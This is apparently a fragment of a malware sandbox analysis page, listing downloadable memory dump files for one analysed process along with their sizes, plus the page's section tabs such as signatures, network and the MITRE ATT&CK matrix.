memory/2848-98-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
memory/2848-99-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

Filesize
4KB

Download
memory/2848-7-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
memory/2848-6-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/2848-130-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

Filesize
9.6MB

Download
memory/2848-5-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads